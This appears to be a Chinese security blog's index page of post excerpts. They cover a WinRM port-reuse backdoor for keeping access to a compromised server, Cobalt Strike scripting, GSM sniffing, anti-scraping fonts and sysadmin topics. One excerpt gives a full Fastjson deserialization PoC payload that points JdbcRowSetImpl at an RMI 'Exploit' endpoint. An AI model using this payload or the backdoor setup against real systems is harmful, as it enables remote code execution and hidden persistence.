2020-08-10 13:38:56    379    0    0
### 0x0. 基本原理介绍 该后门的基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。这句话是抄的。话不多网上有详细介绍。在用本后门的情况下是必须拿下服务器,用来维持一段时间的权限,要想一直不被发现请移步rootkit! ### 0x1. 后门配置方法 首先查看系统有没有启动该服务,如没有启动请启动,没有启动的
2020-08-10 13:38:30    359    0    0
poc ``` {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} ```
2020-08-10 13:38:13    371    0    0
##什么是AggressorScripts Aggressor Script是Cobalt Strike 3.0版及更高版本中内置的脚本语言。Aggresor Script允许您修改和扩展Cobalt Strike客户端 Aggressor Script是一种脚本语言,用于红方操作和可编写脚本的IRC客户端和机器人启发的对手模拟。它的目的是双重的。您可以创建长时间运行的机器人模拟虚拟红色团队成员,
2020-08-10 13:37:53    366    0    0
##0x0 前言 反爬虫和爬虫之间的较量已经争斗多年,不管是攻还是守,已经持续N年,这是一个没有硝烟的战场,大家都知道爬虫和反爬之家的道高一尺魔高一丈的关系。但这个方案可以很大程度上可以增加普通爬虫的采集成本,在不使用OCR的前提下,算是比较极致的方案了。当然方案有很多种,层出不穷的各种方法,这里介绍的时候反爬虫的中的一种比较实用的方案,字体反爬也就是自定义字体反爬通过调用自定义的ttf文件
2020-08-10 13:37:31    356    0    0
![0](https://raw.githubusercontent.com/hackxx/javaweb-codereview/master/media/15460052300727/0.png) @Author [安百科技](http://www.anbai.com)-[凌天实验室](http://www.absec.cn)-[园长](http://javaweb.org)[连长](http
2020-08-10 13:34:37    358    0    0
------- ##0x0 前言 嗅探装置价格低廉,很容易买到,一般几百块钱就可以配一套。一般使用摩托罗拉C118手机主板、天线、串口模块改装成嗅探设备。现在虽然大家都用4G的LTE网络了但是还有大量的2G的GSM网络存在,现在的GSM网络主要是中国移动的用户,中国电信没有GSM网络,中国联通在清退GSM网络,中国移动先清退的是3G 的TD网络而不是2G的GSM网络。GSM网络有一个很大的缺陷就
2020-08-10 13:33:24    358    0    0
## 0x0 介绍 Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。为什么要汉化?做为一个半路出家英语不好的人时常不认识某些单词而烦恼,当然这里只是针对自己做评价,大佬众多,如果英语非常流利可以跳过此工具,不
2020-08-10 13:33:04    331    0    0
## 0x0 前言 企业内网属重中之重,一个企业的核心数据,核心业务也在企业内网中运行,内网杂乱没有好的管控和管理是安全风险高发区。下面说的就是企业内网的一个小块,网络管控,在公司不想上防火墙又不想用流控设备,为了节省资金的同时又想要高质量网络的同时一下作为参考。当然如果是大佬公司,一下思路忽略跳过。下图中网桥设备是途中关键设备,如果没有网桥设备不管是日志记录还是网络流控,都不可能实现,以前公司
2020-08-10 13:32:23    310    0    0
# Proxmox 直通物理网卡 ##说明 Proxmox VE (Proxmox Virtual Environment) 有方便易用的WEB界面,基于JAVA的UI和内核接口,可以登录到VM客户方便的操作,还有易用的模板功能,基本跟老外的商业VPS环境差不多了,支持VT和ISCSI,比较实用中小型企业的虚拟集群管理。 ##宿主机上的操作 安装proxmox之前,需要确保cpu开启虚拟化
2020-08-10 13:30:43    317    0    0
#搭建 Selenium 集群 ##引言 工作中用到了 Selenium 作为爬虫去解析网页,发现单机跑慢的要死,所以找了点资料,将官方的 Selenium 集群搭建了起来,下面是搭建的过程。 环境介绍 系统 jdk 环境 selenium 版本 首先从官网上下载好最新版本的selenium-server-standalone.jar https://www.seleniumhq.or